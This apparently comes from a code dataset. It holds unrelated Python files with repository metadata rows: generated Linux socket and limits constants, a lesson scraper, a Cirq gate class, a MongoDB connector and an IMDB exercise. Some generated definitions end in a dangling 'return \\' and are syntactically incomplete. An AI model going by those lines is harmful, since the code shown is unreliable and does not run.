SCHED_RR = 2
CSIGNAL = 0x000000ff
CLONE_VM = 0x00000100
CLONE_FS = 0x00000200
CLONE_FILES = 0x00000400
CLONE_SIGHAND = 0x00000800
CLONE_PID = 0x00001000
CLONE_PTRACE = 0x00002000
CLONE_VFORK = 0x00004000
__defined_schedparam = 1
def IN_CLASSA(a): return ((((in_addr_t)(a)) & (-2147483648)) == 0)
IN_CLASSA_NET = (-16777216)
IN_CLASSA_NSHIFT = 24
IN_CLASSA_HOST = ((-1) & ~IN_CLASSA_NET)
IN_CLASSA_MAX = 128
def IN_CLASSB(a): return ((((in_addr_t)(a)) & (-1073741824)) == (-2147483648))
IN_CLASSB_NET = (-65536)
IN_CLASSB_NSHIFT = 16
IN_CLASSB_HOST = ((-1) & ~IN_CLASSB_NET)
IN_CLASSB_MAX = 65536
def IN_CLASSC(a): return ((((in_addr_t)(a)) & (-536870912)) == (-1073741824))
IN_CLASSC_NET = (-256)
IN_CLASSC_NSHIFT = 8
IN_CLASSC_HOST = ((-1) & ~IN_CLASSC_NET)
def IN_CLASSD(a): return ((((in_addr_t)(a)) & (-268435456)) == (-536870912))
def IN_MULTICAST(a): return IN_CLASSD(a)
def IN_EXPERIMENTAL(a): return ((((in_addr_t)(a)) & (-536870912)) == (-536870912))
def IN_BADCLASS(a): return ((((in_addr_t)(a)) & (-268435456)) == (-268435456))
IN_LOOPBACKNET = 127
INET_ADDRSTRLEN = 16
INET6_ADDRSTRLEN = 46
# Included from bits/socket.h
# Included from limits.h
_LIBC_LIMITS_H_ = 1
MB_LEN_MAX = 16
_LIMITS_H = 1
CHAR_BIT = 8
SCHAR_MIN = (-128)
SCHAR_MAX = 127
UCHAR_MAX = 255
CHAR_MIN = 0
CHAR_MAX = UCHAR_MAX
CHAR_MIN = SCHAR_MIN
CHAR_MAX = SCHAR_MAX
SHRT_MIN = (-32768)
SHRT_MAX = 32767
USHRT_MAX = 65535
INT_MAX = 2147483647
LONG_MAX = 9223372036854775807L
LONG_MAX = 2147483647L
LONG_MIN = (-LONG_MAX - 1L)
# Included from bits/posix1_lim.h
_BITS_POSIX1_LIM_H = 1
_POSIX_AIO_LISTIO_MAX = 2
_POSIX_AIO_MAX = 1
_POSIX_ARG_MAX = 4096
_POSIX_CHILD_MAX = 6
_POSIX_DELAYTIMER_MAX = 32
_POSIX_LINK_MAX = 8
_POSIX_MAX_CANON = 255
_POSIX_MAX_INPUT = 255
_POSIX_MQ_OPEN_MAX = 8
_POSIX_MQ_PRIO_MAX = 32
_POSIX_NGROUPS_MAX = 0
_POSIX_OPEN_MAX = 16
_POSIX_FD_SETSIZE = _POSIX_OPEN_MAX
_POSIX_NAME_MAX = 14
_POSIX_PATH_MAX = 256
_POSIX_PIPE_BUF = 512
_POSIX_RTSIG_MAX = 8
_POSIX_SEM_NSEMS_MAX = 256
_POSIX_SEM_VALUE_MAX = 32767
_POSIX_SIGQUEUE_MAX = 32
_POSIX_SSIZE_MAX = 32767
_POSIX_STREAM_MAX = 8
_POSIX_TZNAME_MAX = 6
_POSIX_QLIMIT = 1
_POSIX_HIWAT = _POSIX_PIPE_BUF
_POSIX_UIO_MAXIOV = 16
_POSIX_TTY_NAME_MAX = 9
_POSIX_TIMER_MAX = 32
_POSIX_LOGIN_NAME_MAX = 9
_POSIX_CLOCKRES_MIN = 20000000
# Included from bits/local_lim.h
# Included from linux/limits.h
NR_OPEN = 1024
NGROUPS_MAX = 32
ARG_MAX = 131072
CHILD_MAX = 999
OPEN_MAX = 256
LINK_MAX = 127
MAX_CANON = 255
MAX_INPUT = 255
NAME_MAX = 255
PATH_MAX = 4096
PIPE_BUF = 4096
RTSIG_MAX = 32
_POSIX_THREAD_KEYS_MAX = 128
PTHREAD_KEYS_MAX = 1024
_POSIX_THREAD_DESTRUCTOR_ITERATIONS = 4
PTHREAD_DESTRUCTOR_ITERATIONS = _POSIX_THREAD_DESTRUCTOR_ITERATIONS
_POSIX_THREAD_THREADS_MAX = 64
PTHREAD_THREADS_MAX = 1024
AIO_PRIO_DELTA_MAX = 20
PTHREAD_STACK_MIN = 16384
TIMER_MAX = 256
SSIZE_MAX = LONG_MAX
NGROUPS_MAX = _POSIX_NGROUPS_MAX
# Included from bits/posix2_lim.h
_BITS_POSIX2_LIM_H = 1
_POSIX2_BC_BASE_MAX = 99
_POSIX2_BC_DIM_MAX = 2048
_POSIX2_BC_SCALE_MAX = 99
_POSIX2_BC_STRING_MAX = 1000
_POSIX2_COLL_WEIGHTS_MAX = 2
_POSIX2_EXPR_NEST_MAX = 32
_POSIX2_LINE_MAX = 2048
_POSIX2_RE_DUP_MAX = 255
_POSIX2_CHARCLASS_NAME_MAX = 14
BC_BASE_MAX = _POSIX2_BC_BASE_MAX
BC_DIM_MAX = _POSIX2_BC_DIM_MAX
BC_SCALE_MAX = _POSIX2_BC_SCALE_MAX
BC_STRING_MAX = _POSIX2_BC_STRING_MAX
COLL_WEIGHTS_MAX = 255
EXPR_NEST_MAX = _POSIX2_EXPR_NEST_MAX
LINE_MAX = _POSIX2_LINE_MAX
CHARCLASS_NAME_MAX = 2048
RE_DUP_MAX = (0x7fff)
# Included from bits/xopen_lim.h
_XOPEN_LIM_H = 1
# Included from bits/stdio_lim.h
L_tmpnam = 20
TMP_MAX = 238328
FILENAME_MAX = 4096
L_ctermid = 9
L_cuserid = 9
FOPEN_MAX = 16
IOV_MAX = 1024
_XOPEN_IOV_MAX = _POSIX_UIO_MAXIOV
NL_ARGMAX = _POSIX_ARG_MAX
NL_LANGMAX = _POSIX2_LINE_MAX
NL_MSGMAX = INT_MAX
NL_NMAX = INT_MAX
NL_SETMAX = INT_MAX
NL_TEXTMAX = INT_MAX
NZERO = 20
WORD_BIT = 16
WORD_BIT = 32
WORD_BIT = 64
WORD_BIT = 16
WORD_BIT = 32
WORD_BIT = 64
WORD_BIT = 32
LONG_BIT = 32
LONG_BIT = 64
LONG_BIT = 32
LONG_BIT = 64
LONG_BIT = 64
LONG_BIT = 32
from TYPES import *
PF_UNSPEC = 0
PF_LOCAL = 1
PF_UNIX = PF_LOCAL
PF_FILE = PF_LOCAL
PF_INET = 2
PF_AX25 = 3
PF_IPX = 4
PF_APPLETALK = 5
PF_NETROM = 6
PF_BRIDGE = 7
PF_ATMPVC = 8
PF_X25 = 9
PF_INET6 = 10
PF_ROSE = 11
PF_DECnet = 12
PF_NETBEUI = 13
PF_SECURITY = 14
PF_KEY = 15
PF_NETLINK = 16
PF_ROUTE = PF_NETLINK
PF_PACKET = 17
PF_ASH = 18
PF_ECONET = 19
PF_ATMSVC = 20
PF_SNA = 22
PF_IRDA = 23
PF_PPPOX = 24
PF_WANPIPE = 25
PF_BLUETOOTH = 31
PF_MAX = 32
AF_UNSPEC = PF_UNSPEC
AF_LOCAL = PF_LOCAL
AF_UNIX = PF_UNIX
AF_FILE = PF_FILE
AF_INET = PF_INET
AF_AX25 = PF_AX25
AF_IPX = PF_IPX
AF_APPLETALK = PF_APPLETALK
AF_NETROM = PF_NETROM
AF_BRIDGE = PF_BRIDGE
AF_ATMPVC = PF_ATMPVC
AF_X25 = PF_X25
AF_INET6 = PF_INET6
AF_ROSE = PF_ROSE
AF_DECnet = PF_DECnet
AF_NETBEUI = PF_NETBEUI
AF_SECURITY = PF_SECURITY
AF_KEY = PF_KEY
AF_NETLINK = PF_NETLINK
AF_ROUTE = PF_ROUTE
AF_PACKET = PF_PACKET
AF_ASH = PF_ASH
AF_ECONET = PF_ECONET
AF_ATMSVC = PF_ATMSVC
AF_SNA = PF_SNA
AF_IRDA = PF_IRDA
AF_PPPOX = PF_PPPOX
AF_WANPIPE = PF_WANPIPE
AF_BLUETOOTH = PF_BLUETOOTH
AF_MAX = PF_MAX
SOL_RAW = 255
SOL_DECNET = 261
SOL_X25 = 262
SOL_PACKET = 263
SOL_ATM = 264
SOL_AAL = 265
SOL_IRDA = 266
SOMAXCONN = 128
# Included from bits/sockaddr.h
_BITS_SOCKADDR_H = 1
def __SOCKADDR_COMMON(sa_prefix): return \
_SS_SIZE = 128
def CMSG_FIRSTHDR(mhdr): return \
# Included from asm/socket.h
# Included from linux/sockios.h
SIOCADDRT = 0x890B
SIOCDELRT = 0x890C
SIOCRTMSG = 0x890D
SIOCGIFNAME = 0x8910
SIOCSIFLINK = 0x8911
SIOCGIFCONF = 0x8912
SIOCGIFFLAGS = 0x8913
SIOCSIFFLAGS = 0x8914
SIOCGIFADDR = 0x8915
SIOCSIFADDR = 0x8916
SIOCGIFDSTADDR = 0x8917
SIOCSIFDSTADDR = 0x8918
SIOCGIFBRDADDR = 0x8919
SIOCSIFBRDADDR = 0x891a
SIOCGIFNETMASK = 0x891b
SIOCSIFNETMASK = 0x891c
SIOCGIFMETRIC = 0x891d
SIOCSIFMETRIC = 0x891e
SIOCGIFMEM = 0x891f
SIOCSIFMEM = 0x8920
SIOCGIFMTU = 0x8921
SIOCSIFMTU = 0x8922
SIOCSIFNAME = 0x8923
SIOCSIFHWADDR = 0x8924
SIOCGIFENCAP = 0x8925
SIOCSIFENCAP = 0x8926
SIOCGIFHWADDR = 0x8927
SIOCGIFSLAVE = 0x8929
SIOCSIFSLAVE = 0x8930
SIOCADDMULTI = 0x8931
SIOCDELMULTI = 0x8932
SIOCGIFINDEX = 0x8933
SIOGIFINDEX = SIOCGIFINDEX
SIOCSIFPFLAGS = 0x8934
SIOCGIFPFLAGS = 0x8935
SIOCDIFADDR = 0x8936
SIOCSIFHWBROADCAST = 0x8937
SIOCGIFCOUNT = 0x8938
SIOCGIFBR = 0x8940
SIOCSIFBR = 0x8941
SIOCGIFTXQLEN = 0x8942
SIOCSIFTXQLEN = 0x8943
SIOCGIFDIVERT = 0x8944
SIOCSIFDIVERT = 0x8945
SIOCETHTOOL = 0x8946
SIOCGMIIPHY = 0x8947
SIOCGMIIREG = 0x8948
SIOCSMIIREG = 0x8949
SIOCWANDEV = 0x894A
SIOCDARP = 0x8953
SIOCGARP = 0x8954
SIOCSARP = 0x8955
SIOCDRARP = 0x8960
SIOCGRARP = 0x8961
SIOCSRARP = 0x8962
SIOCGIFMAP = 0x8970
SIOCSIFMAP = 0x8971
SIOCADDDLCI = 0x8980
SIOCDELDLCI = 0x8981
SIOCGIFVLAN = 0x8982
SIOCSIFVLAN = 0x8983
SIOCBONDENSLAVE = 0x8990
SIOCBONDRELEASE = 0x8991
SIOCBONDSETHWADDR = 0x8992
SIOCBONDSLAVEINFOQUERY = 0x8993
SIOCBONDINFOQUERY = 0x8994
SIOCBONDCHANGEACTIVE = 0x8995
SIOCBRADDBR = 0x89a0
SIOCBRDELBR = 0x89a1
SIOCBRADDIF = 0x89a2
SIOCBRDELIF = 0x89a3
SIOCDEVPRIVATE = 0x89F0
SIOCPROTOPRIVATE = 0x89E0
# Included from asm/sockios.h
FIOSETOWN = 0x8901
SIOCSPGRP = 0x8902
FIOGETOWN = 0x8903
SOL_SOCKET = 1
SO_DEBUG = 1
SO_REUSEADDR = 2
SO_TYPE = 3
SO_ERROR = 4
SO_DONTROUTE = 5
SO_BROADCAST = 6
SO_SNDBUF = 7
SO_RCVBUF = 8
SO_KEEPALIVE = 9
SO_OOBINLINE = 10
SO_NO_CHECK = 11
SO_PRIORITY = 12
SO_LINGER = 13
SO_BSDCOMPAT = 14
SO_PASSCRED = 16
SO_PEERCRED = 17
SO_RCVLOWAT = 18
SO_SNDLOWAT = 19
SO_RCVTIMEO = 20
SO_SNDTIMEO = 21
SO_SECURITY_AUTHENTICATION = 22
SO_SECURITY_ENCRYPTION_TRANSPORT = 23
SO_SECURITY_ENCRYPTION_NETWORK = 24
SO_BINDTODEVICE = 25
SO_ATTACH_FILTER = 26
SO_DETACH_FILTER = 27
SO_PEERNAME = 28
SO_TIMESTAMP = 29
SCM_TIMESTAMP = SO_TIMESTAMP
SO_ACCEPTCONN = 30
SOCK_STREAM = 1
SOCK_DGRAM = 2
SOCK_RAW = 3
SOCK_RDM = 4
SOCK_SEQPACKET = 5
SOCK_PACKET = 10
SOCK_MAX = (SOCK_PACKET+1)
# Included from bits/in.h
IP_TOS = 1
IP_TTL = 2
IP_HDRINCL = 3
IP_OPTIONS = 4
IP_ROUTER_ALERT = 5
IP_RECVOPTS = 6
IP_RETOPTS = 7
IP_PKTINFO = 8
IP_PKTOPTIONS = 9
IP_PMTUDISC = 10
IP_MTU_DISCOVER = 10
IP_RECVERR = 11
IP_RECVTTL = 12
IP_RECVTOS = 13
IP_MULTICAST_IF = 32
IP_MULTICAST_TTL = 33
IP_MULTICAST_LOOP = 34
IP_ADD_MEMBERSHIP = 35
IP_DROP_MEMBERSHIP = 36
IP_RECVRETOPTS = IP_RETOPTS
IP_PMTUDISC_DONT = 0
IP_PMTUDISC_WANT = 1
IP_PMTUDISC_DO = 2
SOL_IP = 0
IP_DEFAULT_MULTICAST_TTL = 1
IP_DEFAULT_MULTICAST_LOOP = 1
IP_MAX_MEMBERSHIPS = 20
IPV6_ADDRFORM = 1
IPV6_PKTINFO = 2
IPV6_HOPOPTS = 3
IPV6_DSTOPTS = 4
IPV6_RTHDR = 5
IPV6_PKTOPTIONS = 6
IPV6_CHECKSUM = 7
IPV6_HOPLIMIT = 8
IPV6_NEXTHOP = 9
IPV6_AUTHHDR = 10
IPV6_UNICAST_HOPS = 16
IPV6_MULTICAST_IF = 17
IPV6_MULTICAST_HOPS = 18
IPV6_MULTICAST_LOOP = 19
IPV6_JOIN_GROUP = 20
IPV6_LEAVE_GROUP = 21
IPV6_ROUTER_ALERT = 22
IPV6_MTU_DISCOVER = 23
IPV6_MTU = 24
IPV6_RECVERR = 25
IPV6_RXHOPOPTS = IPV6_HOPOPTS
IPV6_RXDSTOPTS = IPV6_DSTOPTS
IPV6_ADD_MEMBERSHIP = IPV6_JOIN_GROUP
IPV6_DROP_MEMBERSHIP = IPV6_LEAVE_GROUP
IPV6_PMTUDISC_DONT = 0
IPV6_PMTUDISC_WANT = 1
IPV6_PMTUDISC_DO = 2
SOL_IPV6 = 41
SOL_ICMPV6 = 58
IPV6_RTHDR_LOOSE = 0
IPV6_RTHDR_STRICT = 1
IPV6_RTHDR_TYPE_0 = 0
# Included from endian.h
_ENDIAN_H = 1
__LITTLE_ENDIAN = 1234
__BIG_ENDIAN = 4321
__PDP_ENDIAN = 3412
# Included from bits/endian.h
__BYTE_ORDER = __LITTLE_ENDIAN
__FLOAT_WORD_ORDER = __BYTE_ORDER
LITTLE_ENDIAN = __LITTLE_ENDIAN
BIG_ENDIAN = __BIG_ENDIAN
PDP_ENDIAN = __PDP_ENDIAN
BYTE_ORDER = __BYTE_ORDER
# Included from bits/byteswap.h
_BITS_BYTESWAP_H = 1
def __bswap_constant_16(x): return \
def __bswap_16(x): return \
def __bswap_16(x): return __bswap_constant_16 (x)
def __bswap_constant_32(x): return \
def __bswap_32(x): return \
def __bswap_32(x): return \
def __bswap_32(x): return __bswap_constant_32 (x)
def __bswap_constant_64(x): return \
def __bswap_64(x): return \
def ntohl(x): return (x)
def ntohs(x): return (x)
def htonl(x): return (x)
def htons(x): return (x)
def ntohl(x): return __bswap_32 (x)
def ntohs(x): return __bswap_16 (x)
def htonl(x): return __bswap_32 (x)
def htons(x): return __bswap_16 (x)
def IN6_IS_ADDR_UNSPECIFIED(a): return \
def IN6_IS_ADDR_LOOPBACK(a): return \
def IN6_IS_ADDR_LINKLOCAL(a): return \
def IN6_IS_ADDR_SITELOCAL(a): return \
def IN6_IS_ADDR_V4MAPPED(a): return \
def IN6_IS_ADDR_V4COMPAT(a): return \
def IN6_IS_ADDR_MC_NODELOCAL(a): return \
def IN6_IS_ADDR_MC_LINKLOCAL(a): return \
def IN6_IS_ADDR_MC_SITELOCAL(a): return \
def IN6_IS_ADDR_MC_ORGLOCAL(a): return \
def IN6_IS_ADDR_MC_GLOBAL(a): return
| 21.241279 | 82 | 0.7785 | 2,346 | 14,614 | 4.369565 | 0.263853 | 0.029265 | 0.014047 | 0.015803 | 0.159302 | 0.126036 | 0.078236 | 0.036972 | 0.011804 | 0.011804 | 0 | 0.163005 | 0.140276 | 14,614 | 687 | 83 | 21.272198 | 0.652897 | 0.054263 | 0 | 0.081882 | 1 | 0 | 0 | 0 | 0 | 0 | 0.038945 | 0 | 0 | 0 | null | null | 0.001742 | 0.001742 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
726f291ded9370fe0d07065b7ca2045c9aafa63e | 718 | py | Python | classes/platzi_lesson.py | memowii/platzi_readme | a56fc73e4dc0964e17550a6683e82fd6c6604299 | [
"MIT"
] | null | null | null | classes/platzi_lesson.py | memowii/platzi_readme | a56fc73e4dc0964e17550a6683e82fd6c6604299 | [
"MIT"
] | null | null | null | classes/platzi_lesson.py | memowii/platzi_readme | a56fc73e4dc0964e17550a6683e82fd6c6604299 | [
"MIT"
] | null | null | null | import re
class PlatziLesson:
    MINUTES_PATTERN = r'(\d+):(\d+)'
HOST_NAME = 'https://platzi.com'
def __init__(self, soup_lesson):
self.lesson = soup_lesson
def get_link(self):
return PlatziLesson.HOST_NAME + self.lesson.a['href']
def get_title(self):
return self.lesson \
.select('.MaterialContent-title')[0] \
.text
def get_duration(self):
text_duration = self.lesson \
.select('.MaterialContent-duration')[0] \
.text
matches = re.search(PlatziLesson.MINUTES_PATTERN, text_duration)
text_minutes = matches.group(1)
return int(text_minutes) | 28.72 | 72 | 0.569638 | 76 | 718 | 5.157895 | 0.434211 | 0.102041 | 0.132653 | 0.158163 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00611 | 0.316156 | 718 | 25 | 73 | 28.72 | 0.792261 | 0 | 0 | 0.105263 | 0 | 0 | 0.111266 | 0.065369 | 0 | 0 | 0 | 0 | 0 | 1 | 0.210526 | false | 0 | 0.052632 | 0.105263 | 0.578947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
727069f9bd77a7cf27d2611b96a0ac1c810cb344 | 68 | py | Python | actingweb/__init__.py | actingweb/box-actingweb | f586458484649aba927cd78c60b4d0fec7b82ca6 | [
"Apache-2.0"
] | null | null | null | actingweb/__init__.py | actingweb/box-actingweb | f586458484649aba927cd78c60b4d0fec7b82ca6 | [
"Apache-2.0"
] | null | null | null | actingweb/__init__.py | actingweb/box-actingweb | f586458484649aba927cd78c60b4d0fec7b82ca6 | [
"Apache-2.0"
] | null | null | null | __all__ = ["actor", "oauth", "auth", "property", "trust", "config"]
| 34 | 67 | 0.588235 | 7 | 68 | 5.142857 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.117647 | 68 | 1 | 68 | 68 | 0.6 | 0 | 0 | 0 | 0 | 0 | 0.485294 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
72721fd7b9c143e6b89767efb0e7098fd83d11c9 | 2,153 | py | Python | cirq-google/cirq_google/ops/sycamore_gate.py | LLcat1217/Cirq | b88069f7b01457e592ad69d6b413642ef11a56b8 | [
"Apache-2.0"
] | 3,326 | 2018-07-18T23:17:21.000Z | 2022-03-29T22:28:24.000Z | cirq-google/cirq_google/ops/sycamore_gate.py | bradyb/Cirq | 610b0d4ea3a7862169610797266734c844ddcc1f | [
"Apache-2.0"
] | 3,443 | 2018-07-18T21:07:28.000Z | 2022-03-31T20:23:21.000Z | cirq-google/cirq_google/ops/sycamore_gate.py | bradyb/Cirq | 610b0d4ea3a7862169610797266734c844ddcc1f | [
"Apache-2.0"
] | 865 | 2018-07-18T23:30:24.000Z | 2022-03-30T11:43:23.000Z | # Copyright 2019 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""An instance of FSimGate that works naturally on Google's Sycamore chip"""
import numpy as np
import cirq
from cirq._doc import document
class SycamoreGate(cirq.FSimGate):
"""The Sycamore gate is a two-qubit gate equivalent to FSimGate(π/2, π/6).
The unitary of this gate is
[[1, 0, 0, 0],
[0, 0, -1j, 0],
[0, -1j, 0, 0],
[0, 0, 0, exp(- 1j * π/6)]]
This gate can be performed on the Google's Sycamore chip and
is close to the gates that were used to demonstrate quantum
supremacy used in this paper:
https://www.nature.com/articles/s41586-019-1666-5
"""
def __init__(self):
super().__init__(theta=np.pi / 2, phi=np.pi / 6)
def __repr__(self) -> str:
return 'cirq_google.SYC'
def __str__(self) -> str:
return 'SYC'
def _circuit_diagram_info_(self, args: cirq.CircuitDiagramInfoArgs):
return 'SYC', 'SYC'
def _json_dict_(self):
return cirq.obj_to_dict_helper(self, [])
SYC = SycamoreGate()
document(
SYC,
"""The Sycamore gate is a two-qubit gate equivalent to FSimGate(π/2, π/6).
The unitary of this gate is
[[1, 0, 0, 0],
[0, 0, -1j, 0],
[0, -1j, 0, 0],
[0, 0, 0, exp(- 1j * π/6)]]
This gate can be performed on the Google's Sycamore chip and
is close to the gates that were used to demonstrate quantum
supremacy used in this paper:
https://www.nature.com/articles/s41586-019-1666-5
""",
)
| 29.902778 | 78 | 0.633999 | 325 | 2,153 | 4.113846 | 0.393846 | 0.026926 | 0.026926 | 0.023934 | 0.390426 | 0.390426 | 0.390426 | 0.390426 | 0.390426 | 0.390426 | 0 | 0.046688 | 0.263818 | 2,153 | 71 | 79 | 30.323944 | 0.796845 | 0.477009 | 0 | 0 | 0 | 0 | 0.043796 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.263158 | false | 0 | 0.157895 | 0.210526 | 0.684211 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
727af29aa66db82c09a5a94a6c77b61afafe59a6 | 141 | py | Python | Guanabara/desafio16.py | manuellaAlvesVarella/python | eedb8362f0ebc8074f87d15c9e629e319ff29394 | [
"MIT"
] | 1 | 2022-03-25T20:42:20.000Z | 2022-03-25T20:42:20.000Z | Guanabara/desafio16.py | manuellaAlvesVarella/python | eedb8362f0ebc8074f87d15c9e629e319ff29394 | [
"MIT"
] | null | null | null | Guanabara/desafio16.py | manuellaAlvesVarella/python | eedb8362f0ebc8074f87d15c9e629e319ff29394 | [
"MIT"
] | null | null | null | import math
num = float(input('enter a number: '))
truc = math.trunc(num)
print('The value was {} and the integer part is {}'.format(num, truc))
7299b95bd6767863f38639482a90267cfec70ef0 | 430 | py | Python | arend/backend/mongo.py | pyprogrammerblog/Arend | ed8a8edf95bde24bfdba29f6c77ac4fb546c7ba7 | [
"MIT"
] | null | null | null | arend/backend/mongo.py | pyprogrammerblog/Arend | ed8a8edf95bde24bfdba29f6c77ac4fb546c7ba7 | [
"MIT"
] | null | null | null | arend/backend/mongo.py | pyprogrammerblog/Arend | ed8a8edf95bde24bfdba29f6c77ac4fb546c7ba7 | [
"MIT"
] | null | null | null | from pymongo import MongoClient
from pymongo.collection import Collection
from arend.settings import base
class MongoTasksConnector:
def __init__(self):
self.db: MongoClient = MongoClient(base.mongodb_string)
self.task_collection: Collection = self.db[base.mongodb_arend_task_results]
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.db.close()
| 25.294118 | 83 | 0.732558 | 54 | 430 | 5.462963 | 0.481481 | 0.061017 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.193023 | 430 | 16 | 84 | 26.875 | 0.850144 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.272727 | false | 0 | 0.272727 | 0.090909 | 0.727273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
729d8dd6e04581384d38812f37e7566beaf83630 | 4,416 | py | Python | curriculum/06_data_01_analysis_2_DAYS/06_data_01_analysis_day_1/06_01_IMDB_sample_answers.py | google/teknowledge | aa55aa59c287f5fe3052e89d539f44252eee41a8 | [
"Apache-2.0"
] | 31 | 2017-11-11T09:10:57.000Z | 2021-10-13T22:53:57.000Z | curriculum/06_data_01_analysis_2_DAYS/06_data_01_analysis_day_1/06_01_IMDB_sample_answers.py | google/teknowledge | aa55aa59c287f5fe3052e89d539f44252eee41a8 | [
"Apache-2.0"
] | null | null | null | curriculum/06_data_01_analysis_2_DAYS/06_data_01_analysis_day_1/06_01_IMDB_sample_answers.py | google/teknowledge | aa55aa59c287f5fe3052e89d539f44252eee41a8 | [
"Apache-2.0"
] | 14 | 2017-11-10T02:19:42.000Z | 2021-10-13T22:53:47.000Z | from IMDBDatabase import IMDBData
# GUIDED PRACTICE
# Challenge 1.1 - The first step to data analysis is always to understand the
# database. Just like you can use a for loop to print all the elements in a list,
# use a for loop to print all the movieNames in IMDBData.
for movieName in IMDBData:
print(movieName)
# GUIDED PRACTICE
# Challenge 1.2 - Since IMDBData is a dictionary, you can access the data about
# a particular movie with IMDBData["Zootopia"]. Since each movie has a lot of
# data about it, it is also a dictionary. As you did in Challenge 1.1, use a
# for loop to print out all the characteristics that this database stores about
# a particular movie.
#
# Hint: Change the dictionary you are looping over in Challenge 1.1 to instead loop
# over the dictionary IMDBData["Zootopia"]
for attribute in IMDBData["Zootopia"]:
print(attribute)
# GUIDED PRACTICE
# Challenge 1.3 - Great, we now have an understanding of the data that is stored
# in the database! Let's see what that data is. For any one movie in the database,
# print out its stars, rating, genre, and year. An example of getting
# Zootopia's stars is below:
#
# print(IMDBData["Zootopia"]["Stars"])
print(IMDBData["Zootopia"]["Stars"])
print(IMDBData["Zootopia"]["Rating"])
print(IMDBData["Zootopia"]["Genre"])
print(IMDBData["Zootopia"]["Year"])
# GUIDED PRACTICE
# Challenge 1.4 - Now that you understand how the database is structured, let's
# look at the actual database! Open IMDBDatabase.py (NOT .pyc), and look at the
# information stored in the database and how it is structured.
# GUIDED PRACTICE
# Challenge 1.5 - Now let's start answering some questions about these movies.
# For starters, let us determine the highest rated movie in this database. Write
# a loop that goes over all the movies in the database, gets its rating,
# and prints the name and rating of the highest rated movie. Check your answer
# by looking at the actual database.
#
# Hint: You will need to have two variables, maxRating and maxRatedMovie,
# that keep track of the highest rated movie you have seen so far.
maxRating, maxRatedMovie = 0, ""
for movieName in IMDBData:
rating = IMDBData[movieName]["Rating"]
if (rating > maxRating):
maxRating = rating
maxRatedMovie = movieName
print(maxRatedMovie, " is the highest rated movie in the database, with rating ", maxRating)
# Challenge 1.6 - Now let's find the oldest movie in the database. Write a loop
# that goes over every movie in the database, get its year, and ends up printing
# the name and year of the oldest movie. Check your answer by looking at the
# actual database.
#
# Hint: Like in Challenge 1.5, you will have to maintain two variables as you
# go through the loop. But this time, they will keep track of the oldestYear you
# have seen so far, and the name of the oldestMovie.
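# A possible answer sketch for Challenge 1.6, following the same two-variable
# pattern as Challenge 1.5. The small IMDBData dictionary below is a
# hypothetical stand-in so the snippet runs on its own; in the real exercise
# the data comes from `from IMDBDatabase import IMDBData`.

```python
# Stand-in data (hypothetical; replace with the imported IMDBData).
IMDBData = {
    "Zootopia": {"Year": 2016},
    "Toy Story": {"Year": 1995},
    "Up": {"Year": 2009},
}

# Track the oldest year and movie name seen so far.
oldestYear, oldestMovie = 9999, ""
for movieName in IMDBData:
    year = IMDBData[movieName]["Year"]
    if year < oldestYear:
        oldestYear = year
        oldestMovie = movieName
print(oldestMovie, "is the oldest movie in the database, from", oldestYear)
```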
# Challenge 1.7 - Now let's find the number of Animation movies in the database.
# Write a loop that goes over every movie in the database, get its genre, and
# ends up printing the number of Animation movies. Check your answer by
# looking at the actual database.
#
# Hint: This time, you will have to maintain one variable, which represents the
# number of Animation movies you have seen so far.
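# A possible answer sketch for Challenge 1.7: a single counter variable bumped
# inside the loop. The tiny IMDBData dictionary is again a hypothetical
# stand-in for the imported database.

```python
# Stand-in data (hypothetical; replace with the imported IMDBData).
IMDBData = {
    "Zootopia": {"Genre": "Animation"},
    "Toy Story": {"Genre": "Animation"},
    "Cast Away": {"Genre": "Drama"},
}

# Count movies whose Genre attribute equals "Animation".
animationCount = 0
for movieName in IMDBData:
    if IMDBData[movieName]["Genre"] == "Animation":
        animationCount += 1
print("There are", animationCount, "Animation movies in the database")
```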
